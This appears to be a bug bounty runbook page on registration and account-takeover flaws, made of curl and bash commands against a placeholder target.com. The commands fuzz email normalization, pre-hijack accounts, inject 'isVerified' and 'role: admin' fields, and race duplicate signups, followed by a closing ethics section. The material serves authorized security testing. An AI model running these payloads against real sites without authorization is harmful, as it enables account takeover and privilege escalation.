Webupdated Oct 1, 2026

Registration & Takeover Vulnerabilities

Identity confusion, unverified accounts, and logic flaws that let an attacker pre-hijack or steal an account at signup.

toolbox:curljqffuf

A registration abuse runbook for bug bounty / authorized pentest on in-scope targets only. Goal: find an identity mismatch at signup that lets you pre-hijack or take over an account, proving it with accounts you control.

1. Map the signup and verification flow

curl -s -X POST "https://target.com/api/register" \
  -H "Content-Type: application/json" \
  -d '{"email":"me1@test.com","password":"Passw0rd!"}' | jq .
curl -s "https://target.com/api/me" -H "Cookie: session=$SESSION" | jq .

Note how email is normalized, whether verification is required, and what state an unverified account holds.

2. Test identifier normalization

for e in "me@test.com" "Me@test.com" "me+1@test.com" "me@test.com." \
         "me@googlemail.com" "me@test.com%00"; do
  printf '%s -> ' "$e"
  curl -s -o /dev/null -w '%{http_code}\n' -X POST \
    "https://target.com/api/register" \
    -H "Content-Type: application/json" \
    -d "{\"email\":\"$e\",\"password\":\"Passw0rd!\"}"
done

If two variants share a row or collide on uniqueness, you can squat an identity.

3. Pre-account takeover

curl -s -X POST "https://target.com/api/register" \
  -H "Content-Type: application/json" \
  -d '{"email":"victim-canary@test.com","password":"AttackerPass1!"}' | jq .
curl -s "https://target.com/api/me" -H "Cookie: session=$SESSION" | jq .

Check whether a real verification or SSO attach later inherits attacker-controlled state.

4. Unverified password reset

curl -s -X POST "https://target.com/api/password/forgot" \
  -H "Content-Type: application/json" \
  -d '{"email":"victim-canary@test.com"}' | jq .
curl -s -X POST "https://target.com/api/password/reset" \
  -H "Content-Type: application/json" \
  -d '{"email":"victim-canary@test.com","token":"<token>","password":"NewPass1!"}' | jq .

5. Logic flaws at signup

# Hidden field injection
curl -s -X POST "https://target.com/api/register" \
  -H "Content-Type: application/json" \
  -d '{"email":"me2@test.com","password":"x","isVerified":true,"role":"admin"}' | jq .

# Parallel duplicate registration
for i in $(seq 1 10); do
  curl -s -X POST "https://target.com/api/register" \
    -H "Content-Type: application/json" \
    -d '{"email":"dup@test.com","username":"admin"}' &
done; wait

Also jump straight to the final step of a multi-step flow.

6. Confirm ownership impact

  • Verify which account owns the identifier after each collision.
  • Confirm the target owner would inherit attacker state on first login.
  • Use canary addresses only; never register a real user’s email beyond scope.

Full pipeline

B="https://target.com/api"
curl -s -X POST "$B/register" -H "Content-Type: application/json" \
  -d '{"email":"me1@test.com","password":"Passw0rd!"}' | jq .
for e in "me@test.com" "Me@test.com" "me+1@test.com" "me@test.com."; do
  printf '%s -> ' "$e"
  curl -s -o /dev/null -w '%{http_code}\n' -X POST "$B/register" \
    -H "Content-Type: application/json" \
    -d "{\"email\":\"$e\",\"password\":\"Passw0rd!\"}"
done
curl -s -X POST "$B/register" -H "Content-Type: application/json" \
  -d '{"email":"victim-canary@test.com","password":"AttackerPass1!"}' | jq .
curl -s -X POST "$B/register" -H "Content-Type: application/json" \
  -d '{"email":"me2@test.com","password":"x","isVerified":true,"role":"admin"}' | jq .
for i in $(seq 1 10); do
  curl -s -X POST "$B/register" -H "Content-Type: application/json" \
    -d '{"email":"dup@test.com","username":"admin"}' &
done; wait

Ethics & legality

  • Only register with canary addresses and accounts you own.
  • Do not leave pre-hijack state on a real user’s account; delete your test accounts.
  • Never attempt to authenticate as a real victim; prove the flaw up to the state change.
  • Stop the race loop once the duplicate is demonstrated.